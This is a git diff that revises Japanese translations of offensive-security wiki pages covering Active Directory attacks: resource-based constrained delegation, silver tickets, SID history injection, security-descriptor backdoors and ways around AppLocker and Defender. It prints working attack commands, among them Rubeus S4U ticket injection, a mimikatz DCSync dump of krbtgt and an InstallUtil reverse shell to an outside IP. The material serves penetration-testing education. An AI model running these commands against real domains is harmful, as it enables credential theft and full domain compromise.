-ただし、**S4U2Proxy** で使用される **TGS** が **Forwardable でない**場合、基本的な制約付き委任を悪用しようとしても **機能しません**。しかし、リソースベースの制約付き委任を悪用しようとしている場合は、**機能します**（これは脆弱性ではなく、機能のようです）。
+ただし、**S4U2Proxy** で使用される **TGS** が **Forwardable でない**場合、基本的な制約付き委任を悪用しようとしても**機能しません**。しかし、リソースベースの制約付き委任を悪用しようとしている場合は、**機能します**（これは脆弱性ではなく、機能のようです）。
 
 ### 攻撃構造
 
-> **コンピュータ**アカウントに対して **書き込み同等の権限**を持っている場合、そのマシンで **特権アクセス**を取得できます。
+> **コンピュータ**アカウントに対して**書き込み同等の権限**を持っている場合、そのマシンに**特権アクセス**を取得できます。
 
-攻撃者がすでに **被害者コンピュータに対する書き込み同等の権限**を持っていると仮定します。
+攻撃者がすでに**被害者コンピュータに対して書き込み同等の権限**を持っていると仮定します。
 
-1. 攻撃者は **SPN** を持つアカウントを **侵害**するか、**作成します**（“Service A”）。特に、**特別な権限を持たない** _Admin User_ は最大10個の **コンピュータオブジェクト**（_**MachineAccountQuota**_）を **作成**し、それに **SPN** を設定できます。したがって、攻撃者はコンピュータオブジェクトを作成し、SPNを設定することができます。
-2. 攻撃者は被害者コンピュータ（ServiceB）に対する **書き込み権限**を悪用して、**リソースベースの制約付き委任を構成し、ServiceAがその被害者コンピュータ（ServiceB）に対して任意のユーザーを偽装できるようにします**。
-3. 攻撃者は Rubeus を使用して、**特権アクセスを持つユーザー**のために Service A から Service B への **完全な S4U 攻撃**（S4U2Self と S4U2Proxy）を実行します。
-   1. S4U2Self（侵害または作成されたアカウントの SPN から）：**私に対する Administrator の TGS を要求します**（Forwardable ではありません）。
-   2. S4U2Proxy：前のステップの **Forwardable でない TGS** を使用して、**被害者ホスト**に対する **Administrator** の **TGS** を要求します。
-   3. Forwardable でない TGS を使用している場合でも、リソースベースの制約付き委任を悪用しているため、**機能します**。
-   4. 攻撃者は **パス・ザ・チケット**を行い、ユーザーを **偽装して被害者 ServiceB へのアクセスを得る**ことができます。
+1. 攻撃者は**SPN**を持つアカウントを**侵害**するか、**作成します**（“Service A”）。特に、**特別な権限**を持たない任意の _Admin User_ は、最大10の**コンピュータオブジェクト**（_**MachineAccountQuota**_）を**作成**し、SPNを設定できます。したがって、攻撃者はコンピュータオブジェクトを作成し、SPNを設定することができます。
+2. 攻撃者は、被害者コンピュータ（ServiceB）に対する**書き込み権限**を悪用して、**リソースベースの制約付き委任を構成し、ServiceAがその被害者コンピュータ（ServiceB）に対して任意のユーザーを偽装できるようにします**。
+3. 攻撃者はRubeusを使用して、**Service AからService Bへの完全なS4U攻撃**（S4U2SelfおよびS4U2Proxy）を実行します。対象は**Service Bに特権アクセスを持つユーザー**です。
+   1. S4U2Self（侵害または作成されたアカウントのSPNから）：**私に対するAdministratorのTGSを要求します**（Forwardableではありません）。
+   2. S4U2Proxy：前のステップの**ForwardableでないTGS**を使用して、**被害者ホスト**に対する**Administrator**の**TGS**を要求します。
+   3. ForwardableでないTGSを使用している場合でも、リソースベースの制約付き委任を悪用しているため、**機能します**。
+   4. 攻撃者は**チケットをパス**し、ユーザーを**偽装して被害者ServiceBにアクセス**します。
 
 ドメインの _**MachineAccountQuota**_ を確認するには、次のコマンドを使用できます：
 ```powershell
@@ -39,7 +39,7 @@ Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select Ma
 
 ### コンピュータオブジェクトの作成
 
-[powermad](https://github.com/Kevin-Robertson/Powermad)を使用して、ドメイン内にコンピュータオブジェクトを作成できます。**：**
+[powermad](https://github.com/Kevin-Robertson/Powermad)を使用して、ドメイン内にコンピュータオブジェクトを作成できます。**:**
 ```powershell
 import-module powermad
 New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
@@ -87,7 +87,7 @@ rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:admin
 > [!CAUTION]
 > ユーザーには「**Cannot be delegated**」という属性があります。この属性がTrueの場合、そのユーザーを偽装することはできません。このプロパティはbloodhound内で確認できます。
 
-### アクセス
+### Accessing
 
 最後のコマンドラインは、**完全なS4U攻撃を実行し、管理者から被害者ホストにTGSを**メモリ内に注入します。\
 この例では、管理者から**CIFS**サービスのTGSが要求されたため、**C$**にアクセスできるようになります。
@@ -96,15 +96,15 @@ ls \\victim.domain.local\C$
 ```
 ### サービスチケットの悪用
 
-[**利用可能なサービスチケットについてはこちら**](silver-ticket.md#available-services)を学びます。
+[**利用可能なサービスチケットについてはこちら**](silver-ticket.md#available-services)を学びましょう。
 
 ## Kerberosエラー
 
-- **`KDC_ERR_ETYPE_NOTSUPP`**: これは、kerberosがDESまたはRC4を使用しないように構成されており、RC4ハッシュのみを提供していることを意味します。Rubeusに少なくともAES256ハッシュ（またはrc4、aes128、aes256ハッシュを提供してください）を供給してください。例: `[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
+- **`KDC_ERR_ETYPE_NOTSUPP`**: これは、kerberosがDESまたはRC4を使用しないように構成されており、RC4ハッシュのみを提供していることを意味します。Rubeusに少なくともAES256ハッシュ（またはRC4、AES128、AES256ハッシュをすべて提供）を供給してください。例: `[Rubeus.Program]::MainString("s4u /user:FAKECOMPUTER /aes256:CC648CF0F809EE1AA25C52E963AC0487E87AC32B1F71ACC5304C73BF566268DA /aes128:5FC3D06ED6E8EA2C9BB9CC301EA37AD4 /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:CIFS/M3DC.M3C.LOCAL /ptt".split())`
 - **`KRB_AP_ERR_SKEW`**: これは、現在のコンピュータの時間がDCの時間と異なり、kerberosが正しく機能していないことを意味します。
-- **`preauth_failed`**: これは、指定されたユーザー名 + ハッシュがログインに機能していないことを意味します。ハッシュを生成する際にユーザー名の中に"$"を入れるのを忘れた可能性があります（`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`）。
+- **`preauth_failed`**: これは、指定されたユーザー名 + ハッシュがログインに機能していないことを意味します。ハッシュを生成する際にユーザー名に"$"を入れるのを忘れた可能性があります（`.\Rubeus.exe hash /password:123456 /user:FAKECOMPUTER$ /domain:domain.local`）。
 - **`KDC_ERR_BADOPTION`**: これは以下を意味する可能性があります：
-  - あなたが偽装しようとしているユーザーが、希望するサービスにアクセスできない（偽装できないか、十分な権限がないため）
+  - 偽装しようとしているユーザーが希望するサービスにアクセスできない（偽装できないか、十分な権限がないため）
   - 要求されたサービスが存在しない（winrmのチケットを要求したが、winrmが実行されていない場合）
   - 作成されたfakecomputerが脆弱なサーバーに対する権限を失っており、それを戻す必要がある。
 
diff --git a/src/windows-hardening/active-directory-methodology/security-descriptors.md b/src/windows-hardening/active-directory-methodology/security-descriptors.md
index fde20d92d..0e3d2e636 100644
--- a/src/windows-hardening/active-directory-methodology/security-descriptors.md
+++ b/src/windows-hardening/active-directory-methodology/security-descriptors.md
@@ -12,14 +12,14 @@
 
 ### WMI へのアクセス
 
-ユーザーに**リモートで WMI を実行する**アクセスを与えることができます [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1):
+ユーザーに**リモート WMI を実行する**アクセスを与えることができます [**using this**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1):
 ```bash
 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
 Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
 ```
 ### WinRMへのアクセス
 
-**ユーザーにwinrm PSコンソールへのアクセスを与える** [**これを使用して**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
+**ユーザーにwinrm PSコンソールへのアクセスを提供する** [**これを使用して**](https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemoteWMI.ps1)**:**
 ```bash
 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
 Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
@@ -40,6 +40,6 @@ Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
 # Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
 Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
 ```
-[**シルバー チケット**](silver-ticket.md)を確認して、ドメイン コントローラーのコンピューター アカウントのハッシュをどのように使用できるかを学んでください。
+[**シルバー チケット**](silver-ticket.md)を確認して、ドメイン コントローラーのコンピュータ アカウントのハッシュをどのように使用できるかを学んでください。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/sid-history-injection.md b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
index 110c8174b..38300303a 100644
--- a/src/windows-hardening/active-directory-methodology/sid-history-injection.md
+++ b/src/windows-hardening/active-directory-methodology/sid-history-injection.md
@@ -6,9 +6,9 @@
 
 **SID History Injection Attack**の焦点は、**ドメイン間のユーザー移行を支援し**、以前のドメインからのリソースへの継続的なアクセスを確保することです。これは、**ユーザーの以前のセキュリティ識別子（SID）を新しいアカウントのSID履歴に組み込むことによって**達成されます。特に、このプロセスは、親ドメインからの高特権グループ（例えば、Enterprise AdminsやDomain Admins）のSIDをSID履歴に追加することで、不正アクセスを許可するように操作できます。この悪用により、親ドメイン内のすべてのリソースへのアクセスが付与されます。
 
-この攻撃を実行するための2つの方法があります：**Golden Ticket**または**Diamond Ticket**の作成を通じて。
+この攻撃を実行するための2つの方法があります：**Golden Ticket**または**Diamond Ticket**の作成です。
 
-**"Enterprise Admins"**グループのSIDを特定するには、まずルートドメインのSIDを見つける必要があります。特定した後、Enterprise AdminsグループのSIDは、ルートドメインのSIDに`-519`を追加することで構築できます。例えば、ルートドメインSIDが`S-1-5-21-280534878-1496970234-700767426`の場合、"Enterprise Admins"グループの結果のSIDは`S-1-5-21-280534878-1496970234-700767426-519`になります。
+**"Enterprise Admins"**グループのSIDを特定するには、まずルートドメインのSIDを見つける必要があります。特定した後、Enterprise AdminsグループのSIDは、ルートドメインのSIDに`-519`を追加することで構築できます。例えば、ルートドメインのSIDが`S-1-5-21-280534878-1496970234-700767426`の場合、"Enterprise Admins"グループのSIDは`S-1-5-21-280534878-1496970234-700767426-519`になります。
 
 **Domain Admins**グループも使用できますが、これは**512**で終わります。
 
diff --git a/src/windows-hardening/active-directory-methodology/silver-ticket.md b/src/windows-hardening/active-directory-methodology/silver-ticket.md
index b333f83ed..742bb1a42 100644
--- a/src/windows-hardening/active-directory-methodology/silver-ticket.md
+++ b/src/windows-hardening/active-directory-methodology/silver-ticket.md
@@ -6,7 +6,7 @@
 
 ## Silver ticket
 
-**Silver Ticket**攻撃は、Active Directory (AD) 環境におけるサービスチケットの悪用を含みます。この手法は、**サービスアカウントのNTLMハッシュを取得すること**に依存しており、コンピュータアカウントなどを使用して、チケットグラントサービス (TGS) チケットを偽造します。この偽造されたチケットを使用することで、攻撃者はネットワーク上の特定のサービスにアクセスでき、**任意のユーザーを偽装**し、通常は管理者権限を狙います。チケットを偽造する際にAESキーを使用することが、より安全で検出されにくいことが強調されています。
+**Silver Ticket**攻撃は、Active Directory (AD) 環境におけるサービスチケットの悪用を含みます。この手法は、**サービスアカウントのNTLMハッシュを取得すること**に依存しており、コンピュータアカウントなどのチケットを偽造するために使用されます。この偽造されたチケットを使用することで、攻撃者はネットワーク上の特定のサービスにアクセスでき、**任意のユーザーを偽装**し、通常は管理者権限を狙います。チケットを偽造する際にAESキーを使用することが、より安全で検出されにくいことが強調されています。
 
 チケット作成には、オペレーティングシステムに基づいて異なるツールが使用されます。
 
@@ -43,7 +43,7 @@ CIFSサービスは、被害者のファイルシステムにアクセスする
 | Windowsリモートサーバー管理ツール | <p>RPCSS</p><p>LDAP</p><p>CIFS</p>                                         |
 | ゴールデンチケット                             | krbtgt                                                                     |
 
-**Rubeus**を使用すると、次のパラメータを使用して**すべての**チケットを**要求**できます：
+**Rubeus**を使用すると、次のパラメータを使用して**すべての**チケットを**要求**できます:
 
 - `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
 
@@ -105,22 +105,22 @@ wmic remote.computer.local list full /format:list
 
 ### HOST + WSMAN (WINRM)
 
-winrmアクセスを介してコンピュータに**アクセス**し、PowerShellを取得することもできます：
+winrmアクセスを介してコンピュータに**アクセス**し、PowerShellを取得することさえできます：
 ```bash
 New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
 ```
-次のページを確認して、**winrmを使用してリモートホストに接続する方法**を学んでください：
+以下のページを確認して、**winrmを使用してリモートホストに接続する他の方法**を学んでください：
 
 {{#ref}}
 ../lateral-movement/winrm.md
 {{#endref}}
 
 > [!WARNING]
-> **winrmはリモートコンピュータでアクティブでリスニングしている必要があります**。
+> **winrmがリモートコンピュータでアクティブでリスニングしている必要があります**ので、アクセスするには注意してください。
 
 ### LDAP
 
-この特権を使用して、**DCSync**を使用してDCデータベースをダンプできます：
+この特権を使用すると、**DCSync**を使用してDCデータベースをダンプできます：
 ```
 mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
 ```
diff --git a/src/windows-hardening/active-directory-methodology/skeleton-key.md b/src/windows-hardening/active-directory-methodology/skeleton-key.md
index 4d044c9ce..39f0e6221 100644
--- a/src/windows-hardening/active-directory-methodology/skeleton-key.md
+++ b/src/windows-hardening/active-directory-methodology/skeleton-key.md
@@ -12,13 +12,13 @@
 
 ## Mitigations
 
-このような攻撃に対する緩和策には、サービスのインストールや敏感な特権の使用を示す特定のイベントIDを監視することが含まれます。具体的には、システムイベントID 7045またはセキュリティイベントID 4673を探すことで、疑わしい活動を明らかにできます。さらに、`lsass.exe`を保護されたプロセスとして実行することで、攻撃者の努力を大幅に妨げることができ、これによりカーネルモードドライバを使用する必要が生じ、攻撃の複雑さが増します。
+このような攻撃に対する緩和策には、サービスのインストールや敏感な特権の使用を示す特定のイベントIDを監視することが含まれます。具体的には、システムイベントID 7045またはセキュリティイベントID 4673を探すことで、疑わしい活動を明らかにできます。さらに、`lsass.exe`を保護されたプロセスとして実行することで、攻撃者の努力を大幅に妨げることができ、これによりカーネルモードドライバーを使用する必要が生じ、攻撃の複雑さが増します。
 
 セキュリティ対策を強化するためのPowerShellコマンドは以下の通りです:
 
 - 疑わしいサービスのインストールを検出するには、次のコマンドを使用します: `Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}`
 
-- 特にMimikatzのドライバを検出するには、次のコマンドを利用できます: `Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"}`
+- 特にMimikatzのドライバーを検出するには、次のコマンドを利用できます: `Get-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"}`
 
 - `lsass.exe`を強化するためには、保護されたプロセスとして有効にすることが推奨されます: `New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name RunAsPPL -Value 1 -Verbose`
 
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs.md b/src/windows-hardening/authentication-credentials-uac-and-efs.md
index 601ed79c5..bdb38662e 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs.md
@@ -11,7 +11,7 @@
 
 ### Check
 
-ブラックリストまたはホワイトリストに登録されているファイル/拡張子を確認します：
+どのファイル/拡張子がブラックリスト/ホワイトリストに登録されているかを確認します：
 ```powershell
 Get-ApplockerPolicy -Effective -xml
 
@@ -36,7 +36,7 @@ C:\windows\tracing
 - 一般的に**信頼された**[**"LOLBAS's"**](https://lolbas-project.github.io/)バイナリは、AppLockerを回避するのにも役立ちます。
 - **不適切に書かれたルールも回避される可能性があります**
 - 例えば、**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**のように、**`allowed`**という**フォルダーを任意の場所に作成**すれば許可されます。
-- 組織はしばしば**`%System32%\WindowsPowerShell\v1.0\powershell.exe`実行可能ファイルをブロックすることに焦点を当てますが、**他の**[**PowerShell実行可能ファイルの場所**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations)を忘れがちです。例えば、`%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`や`PowerShell_ISE.exe`などです。
+- 組織はしばしば**`%System32%\WindowsPowerShell\v1.0\powershell.exe`**実行可能ファイルを**ブロックすることに焦点を当てますが、**他の**[**PowerShell実行可能ファイルの場所**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations)を忘れがちです。例えば、`%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`や`PowerShell_ISE.exe`などです。
 - **DLLの強制は非常に稀に有効**であり、システムにかかる追加の負荷や、何も壊れないことを確認するために必要なテストの量が理由です。したがって、**DLLをバックドアとして使用することでAppLockerを回避するのに役立ちます**。
 - [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)や[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)を使用して、**任意のプロセスでPowershell**コードを**実行し、AppLockerを回避する**ことができます。詳細については、[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)を確認してください。
 
@@ -69,11 +69,11 @@ LSAはディスクにいくつかの資格情報を保存することがあり
 
 ## ディフェンダー
 
-[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender)は、Windows 10およびWindows 11、そしてWindows Serverのバージョンで利用可能なアンチウイルスです。**一般的なペンテストツール（例：**`WinPEAS`**）を**ブロック**します。しかし、これらの保護を**回避する方法**があります。
+[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft_Defender)は、Windows 10およびWindows 11、Windows Serverのバージョンで利用可能なアンチウイルスです。**一般的なペンテストツール**（例：**`WinPEAS`**）を**ブロック**します。しかし、これらの保護を**回避する方法**があります。
 
 ### チェック
 
-**Defender**の**状態**を確認するには、PSコマンドレット**`Get-MpComputerStatus`**を実行できます（**`RealTimeProtectionEnabled`**の値を確認して、アクティブかどうかを知ることができます）：
+**Defender**の**ステータス**を確認するには、PSコマンドレット**`Get-MpComputerStatus`**を実行できます（**`RealTimeProtectionEnabled`**の値を確認して、アクティブかどうかを知る）：
 
 <pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
 
@@ -110,7 +110,7 @@ EFSは、**対称鍵**である**ファイル暗号化鍵（FEK）**を使用し
 - ファイルやフォルダーが[FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table)のような非EFSファイルシステムに移動されると、自動的に復号されます。
 - SMB/CIFSプロトコルを介してネットワーク上で送信された暗号化ファイルは、送信前に復号されます。
 
-この暗号化方法は、所有者に対して暗号化ファイルへの**透過的アクセス**を提供します。ただし、所有者のパスワードを単に変更してログインするだけでは復号は許可されません。
+この暗号化方法は、所有者に対して暗号化ファイルへの**透過的アクセス**を提供します。ただし、所有者のパスワードを変更してログインするだけでは復号は許可されません。
 
 **重要なポイント**：
 
@@ -121,16 +121,16 @@ EFSは、**対称鍵**である**ファイル暗号化鍵（FEK）**を使用し
 
 ### EFS情報の確認
 
-この**サービス**を**使用した**かどうかを確認するには、このパスが存在するか確認します：`C:\users\<username>\appdata\roaming\Microsoft\Protect`
+この**サービス**を**使用**した**ユーザー**がいるか確認するには、このパスが存在するかチェックします：`C:\users\<username>\appdata\roaming\Microsoft\Protect`
 
-ファイルへの**アクセス権**を確認するには、cipher /c \<file>\を使用します。\
+ファイルへの**アクセス**権を確認するには、cipher /c \<file>\を使用します。\
 フォルダー内で`cipher /e`および`cipher /d`を使用して、すべてのファイルを**暗号化**および**復号**することもできます。
 
 ### EFSファイルの復号
 
 #### 権限のあるシステムであること
 
-この方法では、**被害者ユーザー**がホスト内で**プロセス**を**実行している**必要があります。その場合、`meterpreter`セッションを使用してユーザーのプロセスのトークンを偽装することができます（`incognito`の`impersonate_token`）。または、ユーザーのプロセスに`migrate`することもできます。
+この方法では、**被害者ユーザー**がホスト内で**プロセス**を**実行**している必要があります。その場合、`meterpreter`セッションを使用してユーザーのプロセスのトークンを偽装することができます（`incognito`の`impersonate_token`）。または、ユーザーのプロセスに`migrate`することもできます。
 
 #### ユーザーのパスワードを知っていること
 
@@ -138,7 +138,7 @@ EFSは、**対称鍵**である**ファイル暗号化鍵（FEK）**を使用し
 
 ## Group Managed Service Accounts (gMSA)
 
-Microsoftは、ITインフラストラクチャにおけるサービスアカウントの管理を簡素化するために**グループ管理サービスアカウント（gMSA）**を開発しました。従来のサービスアカウントは「**パスワードは期限切れにならない**」設定が有効であることが多いのに対し、gMSAはより安全で管理しやすいソリューションを提供します：
+Microsoftは、ITインフラストラクチャにおけるサービスアカウントの管理を簡素化するために**グループ管理サービスアカウント（gMSA）**を開発しました。従来のサービスアカウントは「**パスワードは期限切れにならない**」設定が有効であることが多いですが、gMSAはより安全で管理しやすいソリューションを提供します：
 
 - **自動パスワード管理**：gMSAは、ドメインまたはコンピュータポリシーに従って自動的に変更される複雑な240文字のパスワードを使用します。このプロセスはMicrosoftのキー配布サービス（KDC）によって処理され、手動でのパスワード更新が不要になります。
 - **強化されたセキュリティ**：これらのアカウントはロックアウトに対して免疫があり、対話的ログインには使用できないため、セキュリティが向上します。
@@ -154,13 +154,13 @@ gMSAのパスワードはLDAPプロパティ_**msDS-ManagedPassword**_に保存
 ```
 /GMSAPasswordReader --AccountName jkohler
 ```
-[**この投稿で詳細情報を見つける**](https://cube0x0.github.io/Relaying-for-gMSA/)
+[**この投稿で詳細を確認してください**](https://cube0x0.github.io/Relaying-for-gMSA/)
 
 また、**gMSA**の**パスワード**を**読み取る**ための**NTLMリレー攻撃**を実行する方法については、こちらの[ウェブページ](https://cube0x0.github.io/Relaying-for-gMSA/)を確認してください。
 
 ## LAPS
 
-**ローカル管理者パスワードソリューション (LAPS)**は、[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)からダウンロード可能で、ローカル管理者パスワードの管理を可能にします。これらのパスワードは**ランダム化**され、ユニークで、**定期的に変更**され、Active Directoryに中央集権的に保存されます。これらのパスワードへのアクセスは、ACLを通じて承認されたユーザーに制限されています。十分な権限が付与されると、ローカル管理者パスワードを読み取る能力が提供されます。
+**ローカル管理者パスワードソリューション (LAPS)**は、[Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=46899)からダウンロード可能で、ローカル管理者パスワードの管理を可能にします。これらのパスワードは**ランダム化**され、ユニークで、**定期的に変更**され、Active Directoryに中央集権的に保存されます。これらのパスワードへのアクセスは、ACLを通じて認可されたユーザーに制限されています。十分な権限が付与されると、ローカル管理者パスワードを読み取る能力が提供されます。
 
 {{#ref}}
 active-directory-methodology/laps.md
@@ -191,11 +191,11 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
 ```bash
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
 ```
-[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) または [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) を使用して、任意のプロセスで **Powershell** コードを実行し、制約モードを回避できます。詳細については、次を確認してください: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)。
+[**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) または [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) を使用して、任意のプロセスで **Powershell** コードを実行し、制約モードを回避できます。詳細については、[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode) を確認してください。
 
 ## PS 実行ポリシー
 
-デフォルトでは **restricted** に設定されています。このポリシーを回避する主な方法:
+デフォルトでは **restricted** に設定されています。このポリシーを回避する主な方法：
 ```powershell
 1º Just copy and paste inside the interactive PS console
 2º Read en Exec
@@ -240,7 +240,7 @@ SSPIは、通信を希望する2台のマシンに適切なプロトコルを見
 
 ## UAC - ユーザーアカウント制御
 
-[ユーザーアカウント制御 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) は、**昇格された活動のための同意プロンプトを有効にする**機能です。
+[ユーザーアカウント制御 (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works)は、**昇格された活動のための同意プロンプトを有効にする**機能です。
 
 {{#ref}}
 windows-security-controls/uac-user-account-control.md
diff --git a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
index 832f8258f..85e63939e 100644
--- a/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
+++ b/src/windows-hardening/authentication-credentials-uac-and-efs/README.md
@@ -4,14 +4,14 @@
 
 ## AppLocker Policy
 
-アプリケーションホワイトリストは、システム上で存在し実行されることが許可された承認済みソフトウェアアプリケーションまたは実行可能ファイルのリストです。目的は、環境を有害なマルウェアや、組織の特定のビジネスニーズに合致しない未承認のソフトウェアから保護することです。
+アプリケーションホワイトリストは、システム上で存在し実行されることが許可された承認済みのソフトウェアアプリケーションまたは実行可能ファイルのリストです。目的は、環境を有害なマルウェアや、組織の特定のビジネスニーズに合致しない未承認のソフトウェアから保護することです。
 
 [AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) は、Microsoftの**アプリケーションホワイトリストソリューション**であり、システム管理者に**ユーザーが実行できるアプリケーションとファイルを制御する**権限を与えます。これは、実行可能ファイル、スクリプト、Windowsインストーラーファイル、DLL、パッケージアプリ、およびパックされたアプリインストーラーに対して**詳細な制御**を提供します。\
 組織が**cmd.exeとPowerShell.exe**をブロックし、特定のディレクトリへの書き込みアクセスを制限することは一般的ですが、**これらはすべて回避可能です**。
 
 ### Check
 
-ブラックリストまたはホワイトリストに登録されているファイル/拡張子を確認します:
+ブラックリスト/ホワイトリストに登録されているファイル/拡張子を確認します:
 ```powershell
 Get-ApplockerPolicy -Effective -xml
 
@@ -26,7 +26,7 @@ $a.rulecollections
 
 ### バイパス
 
-- AppLockerポリシーをバイパスするための便利な**書き込み可能フォルダー**：AppLockerが`C:\Windows\System32`または`C:\Windows`内の任意のものを実行することを許可している場合、**このバイパスに使用できる書き込み可能フォルダー**があります。
+- AppLockerポリシーをバイパスするための便利な**書き込み可能フォルダー**：AppLockerが`C:\Windows\System32`または`C:\Windows`内の任意の実行を許可している場合、**このバイパスに使用できる書き込み可能フォルダー**があります。
 ```
 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
 C:\Windows\System32\spool\drivers\color
@@ -35,10 +35,10 @@ C:\windows\tracing
 ```
 - 一般的に**信頼された**[**"LOLBAS's"**](https://lolbas-project.github.io/)バイナリは、AppLockerを回避するのにも役立ちます。
 - **不適切に書かれたルールも回避される可能性があります**
-- 例えば、**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**、どこにでも**`allowed`**という**フォルダーを作成**すれば、それが許可されます。
-- 組織はしばしば**`%System32%\WindowsPowerShell\v1.0\powershell.exe`**実行可能ファイルの**ブロック**に焦点を当てますが、**他の**[**PowerShell実行可能ファイルの場所**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations)を忘れがちです。例えば、`%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`や`PowerShell_ISE.exe`などです。
+- 例えば、**`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**のように、**`allowed`**という**フォルダーを任意の場所に作成**すれば、それが許可されます。
+- 組織はしばしば**`%System32%\WindowsPowerShell\v1.0\powershell.exe`実行可能ファイルをブロックすることに焦点を当てますが、**他の**[**PowerShell実行可能ファイルの場所**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations)を忘れがちです。例えば、`%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe`や`PowerShell_ISE.exe`などです。
 - **DLLの強制は非常に稀に有効**であり、システムにかかる追加の負荷や、何も壊れないことを確認するために必要なテストの量が理由です。したがって、**DLLをバックドアとして使用することでAppLockerを回避するのに役立ちます**。
-- [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)や[**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick)を使用して、**Powershell**コードを任意のプロセスで実行し、AppLockerを回避できます。詳細については、[https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)を確認してください。
